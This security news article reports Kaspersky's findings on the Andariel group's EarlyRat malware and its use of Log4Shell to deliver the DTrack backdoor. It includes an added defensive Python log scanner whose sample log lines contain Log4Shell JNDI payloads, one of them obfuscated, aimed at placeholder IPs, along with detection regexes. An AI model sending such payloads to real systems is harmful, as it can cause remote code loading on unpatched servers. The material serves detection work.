New Malware by Lazarus-Backed Andariel Group Exploits Log4j


Last year, the North Korean hacking group Andariel utilized a previously undisclosed malware named EarlyRat to carry out attacks exploiting the Log4j Log4Shell vulnerability.

Lazarus-Backed Andariel Group Exploits Log4j

During their investigation into the group’s operations from March to June 2022, Kaspersky researchers unexpectedly came across a previously unknown malware family.

Kaspersky said the advanced persistent threat group Andariel has operated for over a decade as part of the Lazarus Group.

Researchers characterized the new RAT as “simple” yet effective. Its fundamental capabilities include command execution and system data collection.

During a separate investigation, Kaspersky researchers uncovered Andariel’s campaign and subsequently delved deeper into the matter. Their findings revealed that Andariel initiates infections by exploiting Log4j, ultimately downloading additional malware from a command-and-control (C2) server. Notably, the researchers observed the execution of commands by a human operator, who displayed numerous errors and typos, suggesting the involvement of an inexperienced individual in the operation.

Like many other remote access Trojans, EarlyRat collects system information upon activation and transmits it to the C2 server using a specific template. The transmitted data includes unique machine identifiers and queries that are encrypted using cryptographic keys specified in the ID field.

When executing the Log4j exploit, the malware downloads resources from the command-and-control server and ultimately downloads the DTrack backdoor.
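The infection chain above starts with a Log4Shell exploitation attempt against an exposed service, which is the point a defender can most easily observe. The following is an added example, not code from the article or from Kaspersky, that scans web-server access log lines for the JNDI lookup string that Log4Shell requests carry, including the split-keyword form in which `${lower:…}`/`${upper:…}` lookups hide the word "jndi". The log lines and the IP addresses are constructed for the example (documentation ranges), and the record format assumed is a plain combined access log.

```python
import re
from dataclasses import dataclass

# Constructed sample access-log lines (not from the article or any real incident).
# Line 2 carries the lookup in the User-Agent, line 3 carries an obfuscated form
# in the query string; lines 1 and 4 are benign.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Apr/2022:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [12/Apr/2022:10:01:05 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://198.51.100.7:1389/a}"
203.0.113.12 - - [12/Apr/2022:10:01:09 +0000] "GET /api?x=${${lower:j}ndi:rmi://198.51.100.7:1099/b} HTTP/1.1" 404 0 "-" "curl/7.68.0"
203.0.113.13 - - [12/Apr/2022:10:01:12 +0000] "GET /about HTTP/1.1" 200 2048 "https://example.org/" "Mozilla/5.0"
"""

# The literal lookup prefix Log4j 2.x evaluated before the fix.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# A ${...} lookup nested inside another lookup; benign traffic rarely contains this.
NESTED_LOOKUP = re.compile(r"\$\{[^{}]*\$\{")
# ${lower:x} / ${upper:x} lookups, which Log4j resolves before the outer lookup.
CASE_LOOKUP = re.compile(r"\$\{\s*(lower|upper)\s*:\s*([^{}]*)\}", re.IGNORECASE)


def normalize(text: str) -> str:
    """Resolve ${lower:x}/${upper:x} the way Log4j would, so a keyword split
    across several lookups is reassembled before matching. Loops until no
    further lookups resolve, which handles lookups nested inside lookups."""
    previous = None
    while previous != text:
        previous = text
        text = CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
    return text


@dataclass
class Finding:
    line_no: int
    source_ip: str
    reason: str


def scan_log(log_text: str) -> list[Finding]:
    """Return one Finding per log line that looks like a Log4Shell attempt."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        source_ip = line.split(" ", 1)[0]  # first field of a combined access log
        if JNDI_PATTERN.search(normalize(line)):
            reason = "jndi lookup string"
        elif NESTED_LOOKUP.search(line):
            reason = "nested lookup"
        else:
            continue
        findings.append(Finding(line_no, source_ip, reason))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.source_ip} flagged ({f.reason})")
```

Normalizing before matching matters more than the exact regex: the first wave of Log4Shell traffic was caught by a plain `${jndi:` search, and the variants that followed split or re-cased the keyword precisely to get past that. Whatever the match, the useful response is the same: confirm whether the targeted host runs an unpatched Log4j and then look for the follow-on download from an unfamiliar address, which in the campaign described above is where the actual payload arrives.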

In phishing attacks, malicious documents come with disabled macros. Once they have been enabled, a command is executed and the VBA code pings a server associated with the HolyGhost/Maui ransomware campaign.

Kaspersky noted that although Lazarus is categorized as an advanced persistent threat (APT) group, it deviates from the norm by engaging in typical cybercrime activities, including ransomware deployment.


About the Author:

FirstHackersNews - Identifies Security
